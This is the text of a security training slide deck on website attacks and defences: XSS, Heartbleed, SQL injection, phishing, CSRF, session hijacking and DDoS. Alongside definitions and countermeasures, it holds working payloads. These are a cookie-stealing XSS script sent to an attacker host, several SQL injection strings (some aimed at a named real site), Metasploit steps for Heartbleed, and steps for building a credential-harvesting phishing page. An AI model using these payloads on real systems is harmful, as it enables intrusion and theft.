Website hacking and prevention (All Tools,Topics & Technique )
- 4. Static Websites
• Quick to develop
• Easy to host
• More secure
• Less easily hackable
• Requires web development
expertise to update site
• Site not as useful to the user
• Content can get stagnant
Dynamic Websites
• Slower/Expensive to develop
• Hosting Costs a little more
• Less Secure
• Prone to hacking
• Much more functionalities
• Easy to update
• New content brings people back
to the site and helps in the
search engines
• Can work as a system to allow
staff or users to collaborate
Types of Websites
- 8. Website Technologies
• Markup Languages
HTML
CSS
XML
• Programming and Scripting Languages
JavaScript
VBScript
Php
C#
Perl
Asp.net
• Web Servers
Internet Information Services
(IIS)
Apache
• Databases
SQL Server
MYSQL
- 15. URL HIJACKING
Make money
from your
mistake
They buy badly
spell domain
Redirect
from the
famous
URLs
Fake website
or phishing
site
Infect with a drive
by download
- 18. STROKEJACKING
It is extremely similar to clickjacking, in that a
malicious site has a user doing things they don’t
want to do. Except, this time, it’s with the keyboard
instead of the mouse – hence
the “stroke”. The attacking site gets the user to type
(or cut and paste), the information they’re looking for.
This could lead to another attack (if the user types
JavaScript), or just gathering a username and
password. The user thinks they are logging into a
site, but they’re really sending characters over to the
attacker’s site.
TAPJACKING
• A hacking technique where a malicious application
presents an unreal user interface in order to obtain user
events for a hidden action in the background.
• Like Clickjacking on the web, Tap Jacking occurs when a
malicious application displays a fake user interface that
seems like it can be interacted with, but actually passes
interaction events such as finger taps to a hidden user
interface behind it.
• Mostly the tap jacking technique is used for mobile
application and mobile websites
- 21. Tools and Techniques Required to Perform Attacks
WHOIS
Robots.txt files
HTTrack-clone a website
BeEF Tool
Electronic Data Gathering, Analysis and Retrieval (EDGAR)
Shodan Search
Google Hacking
DNS Lookup
Nslookup
DIG (Domain information Groper)
Netcraft
Httprint
Fierce
Encoder and Decoder
- 26. Definition
Cross-site scripting (XSS) is a type of computer security
vulnerability typically found in web applications.
XSS enables attackers to inject client-side scripts into web pages
viewed by other users.
A cross-site scripting vulnerability may be used by attackers to
bypass access controls such as the same-origin policy.
- 27. XSS Types
Persistent (Stored)
Stored or Persistent XSS is a kind of XSS vulnerability where the
untrusted user input is processed and stored by the server in a file
or database without any validation and this untrusted data is fetched
from the storage and is reflected back in response without encoding
or escaping resulting in permanent code execution at the browser
whenever the stored data is reflected in the response.
- link in other website or email
- 28. XSS Types
Non Persistent (Reflected)
Reflected or Non-Persistent XSS is a kind of XSS vulnerability where
the untrusted user input is immediately processed by the server
without any validation and is reflected back in the response without
encoding or escaping resulting in code execution at the browser.
- forum, bulletin board, feedback form
- 29. XSS Types
Local (DOM based)
DOM Based XSS is a form of client side XSS which occurs in an
environment where the source of the data is in the DOM, the sink is
also in the DOM, and the data flow never leaves the browser. It
occurs when an untrusted data is given at the source is executed as
a result of modifying the DOM “environment” in the browser. DOM
XSS occurs when the untrusted data is not in escaped or encoded
form with respect to the context.
- PDF Adobe Reader, Flash Player
- 32. 2) The attacker creates an attack URL for stealing sensitive
Information and disguises it so that it appears legitimate.
Here it is, <script> document.location =
”http://localhost/attacker.com/redirect.php?a=” + document.cookie</script>
3) The attacker distributes the malicious XSS link via social engineering to
unsuspected users.
- 33. Screenshot
4) When the victim logs in, Javascript embedded with the
malicious XSS link executes and transmits the victim’s login
information to the attacker.
- 35. XSS Risks
XSS can
1) Steal Cookies
- Hijack of user’s session - Unauthorized acess
2)Spy on what you do
3)Modify the content of web page by
- Inserting images or words - Misinforming - Spreading Bad
Reputation
4)Network Mapping
5)XSS viruses
- 36. XSS Countermeasures
1) Content Filtering:
“The application may attempt to detect and remove all scripts from un-
trusted HTML before sending it to the browser.” Content filtering is
otherwise known as sanitization. This defense technique uses filter
functions to remove potentially malicious data or instructions from user
input. Filter functions are applied after user input is read by a web
application, but before the input is employed in a operation or output to the
web browser. Removal of scripts from un-trusted content is a difficult
problem for web applications that permit HTML markup in user input such
as blog. To be completely effective in eliminating XSS, a filter function must
necessarily model the full range of parsing behaviors pertaining to script
execution for several browsers.
- 37. XSS Countermeasures
Challenges of Content Filtering:
Allowing all benign HTML user input, while simultaneously blocking
all potentially harmful scripts in the un-trusted output. Every control
character that can be used to introduce attack code also has a
legitimate use in some benign, non-script context. For example, the ' < '
character needs to be present in hyperlinks and text formatting, and the
' " ' character needs to be present in generic text content. Both are
legitimate and allowed user inputs, but can be abused to mount XSS
attacks. Browser behavior vary from browser to browser, they are
complex to model, not entirely understood and not all known (especially
for closed source browsers like Microsoft internet explorer). Therefore,
from a web application perspective, the task of implementing correct
and complete content filter functions is very difficult, if not impossible.
- 38. XSS Countermeasures
2) Browser Collaboration:
“The application may collaborate with the browser by indicating which
scripts in the web page are authorized, leaving the browser to
ensure the authorization policy is upheld.” Robust prevention of XSS
attacks can be achieved if web browsers are made capable of
distinguishing authorized from unauthorized scripts.
This approach can be implemented by
(a) creating a server–browser collaboration protocol to communicate
the set of authorized scripts, then
(b) modifying the browser to understand this protocol and enforce a
policy denying unauthorized script execution.
- 39. XSS Countermeasures
Challenges of Browser Collaboration:
Although this defense strategy is compelling and effective long term
solution, but its implementation will take long time because web
applications adopting this approach require their users to employ
modified browsers for protection from XSS attacks. To implement this
there must be agreement on some standards for server browser
collaboration, then these new standards must be incorporated in the
normal browser implementation. This is a long, complicated process
that can take several years.
Ex: Browser-Enforced Embedded Policies (BEEP)
- 42. OpenSSL is a software library to be used in applications that need to secure
communications over computer networks against eavesdropping or need to
ascertain the identity of the party at the other end.
It has found wide use in internet web servers, serving a majority of all web sites.
OpenSSL contains an open-source implementation of the SSL and TLS
protocols.
- 44. The Secure Sockets Layer (SSL) and Transport
Layer Security (TLS) is the most widely deployed
security protocol used today. It is essentially a
protocol that provides a secure channel between
two machines operating over the Internet or an
internal network.
- 45. What happened..??
Vulnerability Heartbleed was announced to the world on
7th April 2014, as OpenSSL vulnerability and with a new
code release ( 1.0.1g)
It was found by Google security Team and
Condenomicon
Told that Private keys to SSL certificates could be
exposed
Many Big name companies were vulnerable; Big tech
names, Banks, law enforcement, Intelligence Agencies
But...
- 46. What is heartbeat extension?
Heartbeat is an echo functionality where either side
(client or server) requests that a number of bytes of data
that it sends to the other side be echoed back.
The idea appears to be that this can be used as a keep-
alive feature, with the echo functionality presumably
meant to allow verifying that both ends continue to
correctly handle encryption and decryption
- 48. Background
The Heartbleed vulnerability is possibly the worst thing that ever happened
to online trust. Ironically, Heartbleed makes HTTPS less secure than plain
HTTP because attackers can obtain sensitive data without even having to
intercept traffic.
Initial reactions focused on :
• patching vulnerable web servers,
• revoking SSL certificates
• changing user passwords.
It took a couple more days to realize that Heartbleed also affects client
software, non-web SSL traffic and countless embedded devices which
will never receive a software update.
- 50. It can be performed with powerful exploit
framework, Metasploit
We'll see how it's performed step by step
Step 1: Update Metasploit using msfupdate
Step 2: Start metasploit
Kali > msfconsole
- 52. Step 3 : Find Heartbleed
search heartbleed
This would bring up two modules
auxiliary/scanner/ssl/openssl_heartbleed
and
auxiliary.server/openssl_heartbeat_client_me
mory
We'll use first one
- 54. Step 4
Use Auxiliary module
use auxiliary/scanner/ssl/openssl_heartbleed
This will load the heartbleed module
- 55. info
Type
msf > info
This reveals the options that need to set in order to use this module
and a description of the module
- 57. Step 5
Set options
Although this module has numerous option, the critical one is
RHOSTS
Let's set it to a target website on network that is still vulnerable to
heartbleed
msf > set RHOSTS 192.168.1.169
- 59. Step 6 : Run the module
Finally, set the option 'verbos' to 'true'. This will provide us with
verbos output.
Msf > set verbos true
And lets run it
msf > run
As we can see in next screenshot , the server leaked about 64k
bytes of what was in it's memory
- 61. Let Us Define….
• Alice, Bob: Users of online services.
• Eve: A passive attacker (eavesdropper).
• Trudy: An active attacker who may exploit the
Heartbleed bug by sending specially crafted heartbeat
packets over an SSL (e.g.HTTPS) connection.
• yuri.com: A web site with vulnerable SSL software.
Since OpenSSL is so widely used, any web site should be
considered as a potential yuri.com until proven otherwise.
- 63. 1 Extraction of sensitive data from vulnerable HTTPS
servers
In this scenario Alice enters or consults sensitive data on
yuri.com over HTTPS. Plain-text data linger in the memory
of the web server. Later, Trudy connects as a regular
HTTPS clients and exploits Heartbleed.
Countermeasures for end users
• Do not exchange sensitive information with a web site
until they tell you they have dealt with Heartbleed.
Field reports
• Canadian charged in 'Heartbleed' attack on tax agency.
- 64. 2. Session hijacking from vulnerable HTTPS servers
In this scenario Trudy extracts session cookies rather than
login credentials. This allows her to take control of Alice's
account without waiting for her to enter her credentials.
Countermeasures for end users
• Log out of online services until they have dealt with
Heartbleed.
- 65. 3. Extraction of SSL private keys from vulnerable
HTTPS servers
In this scenario Trudy extracts the SSL/TLS private key of
yuri.com. Regardless of what happens next, leakage of
private keys is always a major failure.
Lessons learned
• Protect private keys with a hardware security module.
Field reports
• Confirmed: Heartbleed Exposes Web Server's Private
SSL Keys
- 66. 5. Tor traffic correlation
Eve, an evil dictator, wants to establish that Alice is using
Tor to communicate with george.com, a foreign human-
rights organization. Eve can spy on all Internet traffic
within her national boundaries but has no wiretapping
authority in other countries. She exploits Heartbleed
massively against vulnerable Tor exit nodes in order to
match outgoing traffic with her local intercepts.
- 67. 4. Man-in-the-middle impersonation of online
services
In this scenario mallory.com impersonates yuri.com after
extracting its SSL private key. This so-called man-in-the-
middle attack (MITM) is more dangerous than passive
snooping because mallory.com can trick Alice into using a
compromised certificate. It also allows mallory.com to
defeat some multi-factor security measures.
Countermeasures for end users
• Check whether your browser detects revoked
certificates.
• If it does not, inspect certificates manually.
Lessons learned
• Heartbleed will probably be the end of the current
certificate revocation infrastructure.
- 68. 6. De-anonymization of hidden servers and users by
malicious Tor nodes
Trudy sets up a number of malicious Tor guard node. She
exploits the Heartbleed vulnerability against clients that
connects to them, including Tor hidden servers and their
users. Although Tor hidden services are encrypted end-to-
end, Trudy can identify vulnerable users and servers
based on plaintext data leaked by Heartbleed at each end.
Besides, if she extracts the private key of a hidden
service, she can impersonate it.
Field reports
• "Tor hidden services might leak their long-term hidden
service identity keys to their guard relays."
- 69. 7. Attacks against VPN servers
Alice is aware that most public WiFi networks provide no
privacy. Therefore she has configured her smartphone
and laptop to connect to the Internet through a VPN
service provider, yuri.com. (Alternatively, she could be
running her own VPN server at home, or using the VPN
feature that comes bundled with her DSL modem or her
NAS box.) Eve snoops on the WiFi network that Alice is
currently using, notices SSL-based VPN traffic from her
smartphone, exploits Heartbleed against the destination
IP address, and retrieves either VPN keys or plaintext
traffic.
Field reports
• Attackers Exploit the Heartbleed OpenSSL Vulnerability
to Circumvent Multi-factor Authentication on VPNs
• OpenVPN uses OpenSSL as its crypto library by default
and thus is affected
- 71. DANGER :
OpenSSL, an open source project staffed by only 10
individuals and run on a limited budget, is used to secure
millions of servers, ensuring the integrity of email, e-
commerce, online banking and other properties, in many
cases for multi-billion dollar companies.
Heartbleed obviously has wide-reaching implications, not
only for the integrity of the Web, but also for mobile apps –
but how much damage did it actually do prior to its
discovery and patching?
- 73. The issue has also spread to mobile devices. Android
apps, for instance, may connect to servers that could be
affected by Heartbleed. While not dedicated browsing
tools such as Google Chrome or Apple Safari, some of
these apps have their own internal browsers, blurring the
line between mobile software and the Web. That risk is
worth noting, not just for the OpenSSL exploit but for
future considerations about overall Internet security.
- 75. These weaknesses are all addressable, and the
speed with which companies and security experts
have acted has been encouraging. Still, the
community will have to stay on its toes to protect the
emerging Internet of Everything from OpenSSL and
future bugs.
- 77. What is SQL?
SQL (Structures Query Language) is a programming language to manage
database.
The managements systems that employ SQL are Microsoft SQL
Database, Oracle, MySQL, PostgreSQL, and others.
- 78. What is SQL Injection
SQL injection i.e. SQLI refers to the injection attack in which the attacker
executes malicious SQL queries that control a web application database
server
The attacker can use SQL injection to :
Add, delete, edit or read content from the database
Read source code from files on the database server
Write files to the database server
- 79. Classification of SQL injections
There are 3 major classifications:
1. In-band SQLi (Classic SQLi)
2. Inferential SQLi (Blind SQLi)
3. Out-of-band SQLi
- 80. In-Band SQLi Or Classic Attacks
Most attacks rely on basic SQL manipulation and are considered
to be classic attacks. It includes
WHERE clause modification
UNION operator injection
query stacking
- 81. WHERE Clause Manipulation: Any user input generally end up in
a WHERE Clause of the data base
Example:
In a login page where username is entered the SQL query looks like this:
SELECT * FROM users WHERE name = '" + userName + "';
if the "userName" variable is crafted in a specific way,the SQL
statement may do more than the code author intended.setting the
"userName" variable as:
' OR '1'='1
or using comments to even block the rest of the query
' OR '1'='1' –
These user inputs renders the SQL Query like the following
SELECT * FROM users WHERE name = '' OR '1'='1';
SELECT * FROM users WHERE name = '' OR '1'='1' -- ';
- 83. SQL injection Using UNION: The UNION operator allows the
attacker to
extract sensitive information from the database.
Example:
USER INPUT:
' AND 'a'='b' UNION SELECT 999, 'abc', 'xyz' FROM members
WHERE 'a'='a
GENERATED QUERY:
SELECT id, name, description FROM products WHERE category = ''
AND 'a'='b' UNION SELECT 999, 'abc', 'xyz' FROM members
WHERE 'a'='a‘
The crafted query returns usernames and passwords of all
members in the database.
- 84. Query stacking:Stacked queries provide a lot of control to the
attacker. By terminating the original query and adding a new one, it
will be possible to modify data and call stored procedures.
Example
A classic attack using this technique could look like the following.
MALICIOUS USER INPUT:
1; DELETE FROM products
GENERATED QUERY WITH MULTIPLE STATEMENTS:
SELECT * FROM products WHERE productid=1;
DELETE FROM products
- 85. Inference SQLi attack
The main intent of the attacker in an inference SQLi is identifying the
injectable parameters, extracting database schema.
Here no data is actually transferred via the web application and the
attacker would not be able to see the result of an attack in-band. It is
also referred as Blind injection attack
There are two well-known attack techniques that are based on
inference:
Boolean-Based-Blind Injection
Time-based-blind Attacks
- 86. Boolean-based-Blind Injection: Information is inferred from the behaviour
of the page by asking the server true/-false questions. If the injected statement
evaluates to true, the site continues to function normally. If the statement
evaluates to false, although there is no descriptive error message, the page
differs significantly from the normally-functioning page.
Example:
In this website it shows some information which is stored in some database
http://www.psn.com.pk/index.php?page=gallery.php&id=519
The attacker finds the vulnerability using Boolean based blind injection
False query:
http://www.psn.com.pk/index.php?page=gallery.php&id=519 and 1=2
True query:
http://www.psn.com.pk/index.php?page=gallery.php&id=519 and 1=1
- 89. Timed-based-blind attack: For Time-based attacks, the attacker
needs to instruct the database to perform a time-intensive operation. If
the web site does not return a response immediately, the web
application is vulnerable to Blind SQL Injection. A popular time intensive
operation is the sleep operation.
Example:
In the website
http://www.psn.com.pk/index.php?page=gallery.php&id=519
To perform time based blind attack the query will become:
http://www.psn.com.pk/index.php?page=gallery.php&id=519 and if(1=1,
sleep(10), false)
- 91. Out-of-band SQLi
Out-of-band attack occurs when the attacker is unable to the same
channel to attack and gather result
Out-of-band techniques, offer an attacker an alternative to inferential
time-based techniques, especially if the server responses are not very
stable.
Consider the following URL crafted by an attacker:
https://example.com/products.aspx?id=1;EXECmaster..xp_dirtree
'test.attacker.com' –
This will produce the following SQL query.
SELECT * FROM products WHERE id=1;EXEC master..xp_dirtree
'test.attacker.com' --
- 92. What happened is that there are now two separated queries that
SQL Server will execute.
/* First Query */
SELECT * FROM products WHERE id=1
/* Second Query */
EXEC master..xp_dirtree 'test.attacker.com' –
The second query is invoking a stored procedure xp_dirtree. This
extended stored procedure can be used to get a list of all the folders
for the folder named in the xp.
- 95. SQL Injection (SQLi)
SQL INJECTION (SQLI) REFERS TO AN INJECTION ATTACK WHEREIN AN ATTACKER
CAN EXECUTE MALICIOUS SQL STATEMENTS (ALSO COMMONLY REFERRED TO AS A
MALICIOUS PAYLOAD) THAT CONTROL A WEB APPLICATION’S DATABASE SERVER
(ALSO COMMONLY REFERRED TO AS A RELATIONAL DATABASE MANAGEMENT
SYSTEM – RDBMS).
- 96. How SQL Injection works
SELECT id FROM users WHERE username=’username’ AND
password=’password’ OR 1=1’
# Define POST variables
uname = request.POST['username']
passwd = request.POST['password’]
# SQL query vulnerable to SQLi
sql = “SELECT id FROM users WHERE username=’” + uname + “’ AND
password=’” + passwd + “’”
# Execute the SQL statement
database.execute(sql)
- 97. What’s the worst an attacker can do with
SQL?
bypass authentication or even impersonate specific users.
allow the complete disclosure of data residing on a database server.
data affects data integrity and could cause repudiation issues, for instance, issues
such as voiding transactions, altering balances and other records.
to delete records from a database
to allow arbitrary execution of operating system commands on the database server
- 98. What is a SQL Injection Vulnerability?
Non-Technical Explanation
Drive through <route> and <where should the bus stop?> if <when should the
bus stop?>.
Drive through route 66 and stop on bus stops if there are people on the bus
stops.
Drive through route 66 and do not stop on bus stops and ignore the rest of this
form. if there are people on the bus stop.
- 99. What is a SQL Injection
Vulnerability?
Technical Explanation
$statement = "SELECT * FROM users WHERE username = 'bob' AND password =
'mysecretpw’”
$statement = "SELECT * FROM users WHERE username = '$user' AND password =
'$password'";
- 100. Different Types of the SQL Injection
Vulnerability
Error based SQL Injection
Boolean Based SQL Injection
Time based SQL Injection
Out-of-Band SQL Injection Vulnerability
- 101. Impacts of the SQL Injection
Vulnerability
Add, delete, edit or read content from the database
Read source code from files on the database server
Write files to the database server
- 102. Preventing SQL Injection Vulnerabilities
Server side scripting languages are not able to determine whether
or not the SQL query string is malformed; all they can do is send a
string to the database server and wait for the interpreted response
when developing web applications you should use prepared
statements to prevent SQL injections. When using prepared
statements the structure and data are separated and can be
interpreted by the sql server without risking that an attacker is able
to change the structure of the SQL query for malicious purposes
- 103. What Can Be Done to Prevent SQL
Injection Attacks?
sanitization
validation
- 104. Sanitization
Sanitization usually involves running any submitted data through a
function (such as MySQL's mysql_real_escape_string() function) to
ensure that any dangerous characters (like " ' ") are not passed to a SQL
query in data.
- 105. Validation
attempts to ensure that the data submitted is in the form that is
expected. At the most basic level this includes ensuring that e-mail
addresses contain an "@" sign, that only digits are supplied when
integer data is expected, and that the length of a piece of data
submitted is not longer than the maximum expected length
Two ways:
by blacklisting dangerous or unwanted characters (although
hackers can often get around blacklists)
by whitelisting only those characters that are allowed in a given
circumstance, which can involve more work on the part of the
programmer
- 106. Others way of prevention
Trust no-one
Don't use dynamic SQL when it can be avoid
Firewall
Update and patch
Reduce your attack surface
Use appropriate privileges
Keep your secrets secret
Don't divulge more information than you need it
- 108. Phreaking + Fishing = Phishing
{Phreaking = making phone calls for free back in 70’s}
Phishing is the act of sending an email to a user falsely claiming to be an
established legitimate enterprise in an attempt to scam the user into
surrendering private information that will be used for identity theft.
What is Phishing ?
- 111. Spear Phishing
Clone Phishing
Whaling
___________________________________________________________
Spear Phishing
Phishing attempts directed at specific individuals or companies have been
termed spear phishing. Attackers may gather personal information about their
target to increase their probability of success. This technique is by far the
most successful on the internet today, accounting for 91% of attacks.
Phishing Types
- 112. Clone Phishing
A type of phishing attack where a legitimate, email containing an attachment or link has
had its content and recipient address taken and used to create an almost identical or
cloned email. The attachment or Link within the email is replaced with a malicious
version and then sent from an email address spoofed to appear to come from the
original sender. It may claim to be a re-send of the original or an updated version to
the original.
Whaling
Several recent phishing attacks have been directed specifically at senior executives and
other high profile targets within businesses, and the term whaling has been coined for
these kinds of attacks.
- 113. Place your screenshot here
Step: 1
Setting Up A Web
Page Which
Looks Similar To
The Original
One.
Link :
http://a0145877.xs
ph.ru/
HERE’S HOW IT’S DONE
- 114. Place your screenshot here
Step: 2
A php script which
stores credentials
to a file is what
required to
harvest
credentials
- 115. Place your screenshot here
Step: 3
In the html page
search for submit
form and change
it to written php
script
- 121. It is the attempt to obtain sensitive information
such as usernames, passwords, and credit card
details, often for malicious reasons, by disguising
as a trustworthy entity in an electronic
communication.
DEFINITION
TYPES OF PHISHING
• Spear phishing
• Clone phishing
• Whaling
• Filter evasion
• Link manipulation
• Tabnabbing
- 125. 1. Be wary of emails asking for confidential information
2. Make sure you familiarise yourself with a website's privacy
policy
3. Watch out for generic-looking requests for information.
4. Never submit confidential information via forms embedded
within email messages.
5. Never use links in an email to connect to a website unless you
are absolutely sure they are authentic. Instead, open a new
browser window and type the URL directly into the address bar
6. Make sure you maintain effective software to combat phishing
How to protect yourself
- 130. Web Browser’s PWD Database
Random passwords are generated and stored in the browsers.
It is more “secure,” as the browser will only give the credentials to the
right URL. If anything changes in the URL, it won’t pass credentials
Disadvantage-
•It doesn’t work fully with sub-domains.
•Even here, passwords are stored in plain text.
- 131. Phishing Scam Alert Add-
ons/Extensions
The concept is like this. If server visits any known
fake/phishing URL, then that tool bar turns red.
- 132. Phishing Scam Alert Add-
ons/Extensions
If that phishing or fake site is the one suspect site, then it turns
yellow.
- 134. Encrypted Key Exchange Process—Prevent
Dictionary Attacks
Series of protocols are implemented for encrypted key
exchange.
This key is generated by combining the shared password.
This process takes place in such a way that the phisher
can’t guess it.
These protocols were awkward to implement and use and
they were also too time-consuming.
- 135. Educating Your People
Conducting seminars and workshops on ethical hacking and
Internet security in order to educate their employees.
This can be a quality step towards security awareness.
Logical awareness has to be raised.
- 138. Definition
Cross-Site Request Forgery (CSRF) is an attack that forces an
end user to execute unwanted actions on a web application in
which they're currently authenticated.
CSRF attacks specifically target state-changing requests, not
theft of data, since the attacker has no way to see the response
to the forged request.
- 139. Definition Cont...
With a little help of social engineering (such as sending a link via email
or chat), an attacker may trick the users of a web application into
executing actions of the attacker's choosing.
If the victim is a normal user, a successful CSRF attack can force the
user to perform state changing requests like transferring funds,
changing their email address, and so forth.
If the victim is an administrative account, CSRF can compromise the
entire web application.
- 140. Process
Root cause of CSRF
Existing browsers do not check whether a client actually initiates an
HTTP request
140
Malicious
Website
Browser
Target
Website
Send login request
Send forged request with
cookies
Return login response with
cookies
Visit malicious website
Return malicious code
- 141. Screenshot
Step 1 − Let us perform a CSRF forgery by embedding a Java script into
an image. The snapshot of the problem is listed below.
- 142. Screenshot
Step 2 − Now we need to mock up the transfer into a 1x1 image and
make the victim to click on the same.
- 143. Screenshot
Step 3 − Upon submitting the message, the message is displayed as
highlighted below.
- 144. Screenshot
Step 4 − Now if the victim clicks the following URL, the transfer is
executed, which can be found intercepting the user action using burp
suite. We are able to see the transfer by spotting it in Get message as
shown below –
Step 5 − Now upon clicking refresh, the lesson completion mark is
shown.
- 145. Tool – OWASP CSRF Tester
Test your applications for CSRF
-Record and replay transactions
-Tune the recorded test case
-Run test case with exported HTML document
Test case alternatives
-Auto-Posting Forms
-Evil iFrame
-IMG Tag
-XMLHTTPRequest
-Link
- 146. Counter Measures
Web application should insert random values, tied to the
specified user’s session, into the forms it generates
Web application should re-authenticate every time when users
are about to perform a particularly dangerous operation
- 147. Counter Measures Cont..
Safe Methods
1) The GET and HEAD methods SHOULD NOT have the significance of
taking an action other than retrieval. These methods ought to be
considered "safe" ...
$_POST superglobal and not $_GET or $_REQUEST
2)Try to force the use of your own forms
- On form generation, store unique token in user $_SESSION and
form hidden field
- On submit, check token
-- Limits attack to only single user
-- Attacker would need to obtain users valid form AND session token
- Put expiry on form tokens
- 149. What is session hijacking ?
Session hijacking is the process of exploiting valid computer session
which involves stealing the victim's cookie.
- 150. What is a cookie ?
• A cookie known as a web cookie or http cookie is a small piece of text
stored by the user browser.
• A cookie is sent as an header by the web server to the web browser on the
client side.
• A cookie is static and is sent back by the browser unchanged every time it
accesses the server.
- 151. Types of session hijacking
1 ) Active : -
In active attack, an attackers finds an active session and takes over.
2 ) Passive : -
With passive attack, an attacker hijacks a session, but sits back, and
watches and record all the traffic that is being send forth
- 156. Session Hijacking
Levels of Session
Hijacking
Session Hijacking ToolsSession Hijacking Steps
CountermeasuresTypes Of Session Hijacking
- 157. Steps in Session Hijacking
Place yourself between the victim and the target
(you must be able to sniff the network)
Monitor the flow of packets
Predict the sequence number
Kill the connection to the victim’s machine
Take over the session
Start injecting packets to the target server
- 158. Types of Session Hijacking
There are two types of session hijacking attacks:
Active
• In an active attack, an attacker finds an
active session and takes over
Passive
• With passive attack, an attacker hijacks a
session, but sits back, and watches and
records all the traffic that is being sent
forth
- 159. Session Hijacking Levels
Session hijacking takes place at two levels:
• Network Level Hijacking
• Application level Hijacking
Network level can be defined as the interception of the packets during the
transmission between client and the server in a TCP and UDP session
Application level is about gaining control on HTTP user session by obtaining the
session ID’s
- 160. Some common tools used for Session
Hijacking
The following are a few that
belong to this category:
• Juggernaut
• Hunt
• TTY Watcher
• IP Watcher
• T-Sight
• Paros HTTP Hijacker
- 161. Counter Measures for Session
Hijacking
Use Encryption
Use Secure protocol(SSL and
HTTPS)
Limit incoming connections
where possible
Minimize remote access
Set a time out for the expiry of
the session when inactive
Expiry of session if the agent if
browsing changes
Logout Functionality
- 162. Counter Measures for Session
Hijacking (Cont….)
ID creation after authoritative
login
Long session ID’s
Forcing re-authentication or set-
up authentication
Captcha prevention
Educate the employees
Expiry of session if the operating
system changes
Expiry of the session if the
device changes(Web Socket)
- 164. What is Distributed Denial of Service?
A denial-of-service attack (DoS attack) is a cyber-attack where the
perpetrator seeks to make a machine or network resource unavailable to
its intended users by temporarily or indefinitely disrupting services of
a host connected to the Internet. Denial of service is typically
accomplished by flooding the targeted machine or resource with
superfluous requests in an attempt to overload systems and prevent some
or all legitimate requests from being fulfilled.
- 167. Volume Based Attacks
Includes UDP floods, ICMP floods, and other spoofed-packet floods. The
attack’s goal is to saturate the bandwidth of the attacked site, and
magnitude is measured in bits per second (Bps).
- 168. Protocol Attacks
Includes SYN floods, fragmented packet attacks, Ping of Death, Smurf
DDoS and more. This type of attack consumes actual server resources, or
those of intermediate communication equipment, such as firewalls and
load balancers, and is measured in Packets per second.
- 169. Application Layer Attacks
Includes low-and-slow attacks, GET/POST floods, attacks that target
Apache, Windows or OpenBSD vulnerabilities and more. Comprised of
seemingly legitimate and innocent requests, the goal of these attacks is to
crash the web server, and the magnitude is measured in Requests per
second.
- 171. Prevention and Mitigation Strategy
The first things to do in DDoS mitigation is to identify normal conditions for
network traffic by defining “traffic patterns”, which is necessary for threat
detection and alerting. DDoS mitigation also requires identifying incoming
traffic to separate human traffic from human-like bots and hijacked web
browsers. The process is done by comparing signatures and examining
different attributes of the traffic, including IP addresses, cookie variations,
HTTP headers, and Javascript footprints.
One technique is to pass network traffic addressed to a potential target
network through high-capacity networks with "traffic scrubbing" filters.
- 173. INVESTIGATION
Challenges in the investigation of Cyber Crime (Website Crime)
Investigation of Cyber-crimes are different from conventional
investigation as:
Incident taking place in Virtual World
Borderless/Transnational
Issues of jurisdiction
Issue of connecting the accused with the
machine/computer
Lack of enthusiasm in reporting Cyber crime
- 174. The essential Requirements for Investigation are:
Immediate Reporting of Breaches.
Adequate Tools.
Trained Investigators.
Computer Literate Witness.
Assistance of Forensic Experts.
Immediate investigation.
Common Procedure of Web Site Crime investigation
Who is., Domain Detail,If domain is active then it must
have working email address and payment detail,
contact registrar, Registrar can give Domain IP address
and cell number and payment instrument.
17
4
- 175. Email ID used for Sell hosting server is important because
police can get email id, creation IP, alternate email ID, Cell
number, IP logs.
An Law Enforcement Agency of the India can demands the
information like IP Logs, Login credentials of the accused for
investigation through Section 91 of CRPC 1973, for detailed
information of Section 91 of CRPC 1973 kindly refer
annexure.
The Law Enforcement agencies can perform detailed
investigation of the Cyber Crime cases through the Internet
Protocol Data Record (IPDR) of the used network. The IPDR
can be obtained from the ISP of the concerned network. The
Sample of the IPDR is shown in figure. 17
5
- 178. Crimes and Laws Relating to Website.
Harassment via fake public profile on social networking
site.
Online Hate Community.
Email Account Hacking.
Web Defacement.
Introducing Viruses, Worms, Backdoors, Rootkits, Trojans,
Bugs.
Cyber Terrorism.
Phishing and Email Scams.
Theft of Confidential Information.
- 179. WEBSITE HACKING CASE STUDY
Hacking and defacement of Assam police website.
Hacker hacks into a financial website.
Indian Army website hacked.
ISRO Website Hack.
Bazee.com
E-Bay Account Takeover
Incometaxpune.Com Redirection To Pornographic Content